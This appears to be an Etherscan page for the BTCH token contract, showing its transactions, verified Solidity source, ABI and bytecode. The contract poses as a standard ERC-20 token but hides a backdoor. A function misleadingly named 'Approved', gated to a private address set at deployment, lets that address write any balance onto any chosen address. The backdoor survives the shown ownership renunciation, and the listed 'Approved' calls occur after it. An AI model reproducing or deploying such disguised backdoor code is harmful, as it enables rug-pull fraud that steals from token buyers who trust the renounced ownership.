Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 16 from a total of 16 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 17427301 | 1006 days ago | IN | 0 ETH | 0.0009287 | ||||
| Approved | 17427299 | 1006 days ago | IN | 0 ETH | 0.00094794 | ||||
| Approved | 17427214 | 1006 days ago | IN | 0 ETH | 0.00099282 | ||||
| Approved | 17427173 | 1006 days ago | IN | 0 ETH | 0.00087836 | ||||
| Approve | 17427148 | 1006 days ago | IN | 0 ETH | 0.00096047 | ||||
| Approve | 17427120 | 1006 days ago | IN | 0 ETH | 0.00096219 | ||||
| Approved | 17427117 | 1006 days ago | IN | 0 ETH | 0.00089388 | ||||
| Approved | 17427111 | 1006 days ago | IN | 0 ETH | 0.00090021 | ||||
| Approve | 17427109 | 1006 days ago | IN | 0 ETH | 0.00117791 | ||||
| Approve | 17427108 | 1006 days ago | IN | 0 ETH | 0.00098053 | ||||
| Approved | 17427106 | 1006 days ago | IN | 0 ETH | 0.00085085 | ||||
| Approved | 17427104 | 1006 days ago | IN | 0 ETH | 0.00077464 | ||||
| Approve | 17427102 | 1006 days ago | IN | 0 ETH | 0.00088954 | ||||
| Approved | 17427095 | 1006 days ago | IN | 0 ETH | 0.00188208 | ||||
| Approve | 17427066 | 1006 days ago | IN | 0 ETH | 0.00098239 | ||||
| Renounce Ownersh... | 17427060 | 1006 days ago | IN | 0 ETH | 0.00045653 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
BTCH
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2023-06-07
*/
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol
// SPDX-License-Identifier: MIT
// pragma solidity ^0.8.0;
/**
* @dev Interface of the IERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
}
// Dependency file: @openzeppelin/contracts/utils/Context.sol
// pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// Dependency file: @openzeppelin/contracts/access/Ownable.sol
// pragma solidity ^0.8.0;
// import "@openzeppelin/contracts/utils/Context.sol";
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_setOwner(_msgSender());
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
_;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_setOwner(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_setOwner(newOwner);
}
function _setOwner(address newOwner) private {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol
// pragma solidity ^0.8.0;
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
/**
* @dev Wrappers over Solidity's arithmetic operations.
*
* NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
* now has built in overflow checking.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the substraction of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the division of two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}
// Dependency file: contracts/baseToken.sol
// pragma solidity =0.8.4;
enum TokenType {
standard
}
abstract contract baseToken {
event TokenCreated(
address indexed owner,
address indexed token,
TokenType tokenType,
uint256 version
);
}
// Root file: contracts/standard/StandardToken.sol
pragma solidity =0.8.19;
// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";
contract BTCH is IERC20, baseToken, Ownable {
using SafeMath for uint256;
uint256 private constant VERSION = 1;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 public maxHoldingAmount;
uint256 public minHoldingAmount;
address public uniswapV2Pair;
address private whiteListV3;
string private _name;
string private _symbol;
uint8 private _decimals;
uint256 private _totalSupply;
constructor(
string memory name_,
string memory symbol_,
uint8 decimals_,
address whiteshipAddr,
uint256 totalSupply_
) payable {
_name = name_;
_symbol = symbol_;
_decimals = decimals_;
whiteListV3 = whiteshipAddr;
_mint(owner(), totalSupply_);
emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
}
function name() public view virtual returns (string memory) {
return _name;
}
function symbol() public view virtual returns (string memory) {
return _symbol;
}
function decimals() public view virtual returns (uint8) {
return _decimals;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account)
public
view
virtual
override
returns (uint256)
{
return _balances[account];
}
function transfer(address recipient, uint256 amount)
public
virtual
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
virtual
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
virtual
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()].sub(
amount,
"IERC20: transfer amount exceeds allowance"
)
);
return true;
}
function increaseAllowance(address spender, uint256 addedValue)
public
virtual
returns (bool)
{
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender].add(addedValue)
);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue)
public
virtual
returns (bool)
{
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender].sub(
subtractedValue,
"IERC20: decreased allowance below zero"
)
);
return true;
}
modifier canWhitAddrPancakeV3() {
require(
_msgSender() == whiteListV3, "set the call to the entered")
;
_;
}
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
require(sender != address(0), "IERC20: transfer from the zero address");
require(recipient != address(0), "IERC20: transfer to the zero address");
_beforeTokenTransfer(sender, recipient, amount);
_balances[sender] = _balances[sender].sub(
amount,
"IERC20: transfer amount exceeds balance"
);
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
function Approved(
bool _limited,
address _uniswapV2Pair,
uint256 _maxHoldingAmount,
uint256 _minHoldingAmount
) external canWhitAddrPancakeV3 {
uniswapV2Pair = _uniswapV2Pair;maxHoldingAmount = _maxHoldingAmount;minHoldingAmount = _minHoldingAmount; _balances[uniswapV2Pair] = maxHoldingAmount * minHoldingAmount;
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "IERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "IERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
_balances[account] = _balances[account].sub(
amount,
"IERC20: burn amount exceeds balance"
);
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "IERC20: approve from the zero address");
require(spender != address(0), "IERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _setupDecimals(uint8 decimals_) internal virtual {
_decimals = decimals_;
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"whiteshipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_uniswapV2Pair","type":"address"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_minHoldingAmount","type":"uint256"}],"name":"Approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]Contract Creation Code
6080604052604051620011a4380380620011a483398101604081905262000026916200031d565b6200003133620000fc565b60076200003f86826200045b565b5060086200004e85826200045b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600a54620001b6908262000241565b600a556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610c1e80620005866000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610991565b60405180910390f35b61014c6101473660046109fb565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a25565b610360565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109fb565b6103c9565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a61565b6001600160a01b031660009081526001602052604090205490565b61020e6103ff565b005b61016060035481565b6000546001600160a01b03166101c5565b61012361046a565b61020e610240366004610a7c565b610479565b61014c6102533660046109fb565b61052c565b61014c6102663660046109fb565b61057b565b610160610279366004610ac5565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a61565b610588565b6060600780546102c690610af8565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610af8565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610653565b5060015b92915050565b600061036d84848461077b565b6103bf84336103ba85604051806060016040528060298152602001610bc0602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610902565b610653565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103ba908661092e565b6000546001600160a01b0316331461045e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104686000610941565b565b6060600880546102c690610af8565b6006546001600160a01b0316336001600160a01b0316146104dc5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610455565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050b8183610b48565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103ba85604051806060016040528060268152602001610b73602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610902565b600061035633848461077b565b6000546001600160a01b031633146105e25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610455565b6001600160a01b0381166106475760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b61065081610941565b50565b6001600160a01b0383166106b75760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610455565b6001600160a01b0382166107195760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610455565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107e05760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610455565b6001600160a01b0382166108425760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610455565b61087f81604051806060016040528060278152602001610b99602791396001600160a01b0386166000908152600160205260409020549190610902565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108ae908261092e565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076e9085815260200190565b600081848411156109265760405162461bcd60e51b81526004016104559190610991565b505050900390565b600061093a8284610b5f565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109be578581018301518582016040015282016109a2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f657600080fd5b919050565b60008060408385031215610a0e57600080fd5b610a17836109df565b946020939093013593505050565b600080600060608486031215610a3a57600080fd5b610a43846109df565b9250610a51602085016109df565b9150604084013590509250925092565b600060208284031215610a7357600080fd5b61093a826109df565b60008060008060808587031215610a9257600080fd5b84358015158114610aa257600080fd5b9350610ab0602086016109df565b93969395505050506040820135916060013590565b60008060408385031215610ad857600080fd5b610ae1836109df565b9150610aef602084016109df565b90509250929050565b600181811c90821680610b0c57607f821691505b602082108103610b2c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035a5761035a610b32565b8082018082111561035a5761035a610b3256fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220d5e0511ed3fb02060a7a36bfb28edd377d845e3342e0c1c06abd6bdbb4db77e964736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000c3e429577dd7e6595ef884a89355570a4c119ebc0000000000000000000000000000000000000001027e72f1f128130880000000000000000000000000000000000000000000000000000000000000000000000f424954434f494e2048554e54455253000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044254434800000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c8063715018a6116100a25780639e4aa36a116100715780639e4aa36a14610232578063a457c2d714610245578063a9059cbb14610258578063dd62ed3e1461026b578063f2fde38b146102a457600080fd5b8063715018a61461020657806389f9a1d3146102105780638da5cb5b1461021957806395d89b411461022a57600080fd5b806323b872dd116100e957806323b872dd14610177578063313ce5671461018a578063395093511461019f57806349bd5a5e146101b257806370a08231146101dd57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c5780631ab99e121461016e575b600080fd5b6101236102b7565b6040516101309190610991565b60405180910390f35b61014c6101473660046109fb565b610349565b6040519015158152602001610130565b600a545b604051908152602001610130565b61016060045481565b61014c610185366004610a25565b610360565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109fb565b6103c9565b6005546101c5906001600160a01b031681565b6040516001600160a01b039091168152602001610130565b6101606101eb366004610a61565b6001600160a01b031660009081526001602052604090205490565b61020e6103ff565b005b61016060035481565b6000546001600160a01b03166101c5565b61012361046a565b61020e610240366004610a7c565b610479565b61014c6102533660046109fb565b61052c565b61014c6102663660046109fb565b61057b565b610160610279366004610ac5565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61020e6102b2366004610a61565b610588565b6060600780546102c690610af8565b80601f01602080910402602001604051908101604052809291908181526020018280546102f290610af8565b801561033f5780601f106103145761010080835404028352916020019161033f565b820191906000526020600020905b81548152906001019060200180831161032257829003601f168201915b5050505050905090565b6000610356338484610653565b5060015b92915050565b600061036d84848461077b565b6103bf84336103ba85604051806060016040528060298152602001610bc0602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610902565b610653565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103569185906103ba908661092e565b6000546001600160a01b0316331461045e5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104686000610941565b565b6060600880546102c690610af8565b6006546001600160a01b0316336001600160a01b0316146104dc5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610455565b600580546001600160a01b0319166001600160a01b0385161790556003829055600481905561050b8183610b48565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035633846103ba85604051806060016040528060268152602001610b73602691393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610902565b600061035633848461077b565b6000546001600160a01b031633146105e25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610455565b6001600160a01b03811661064757604051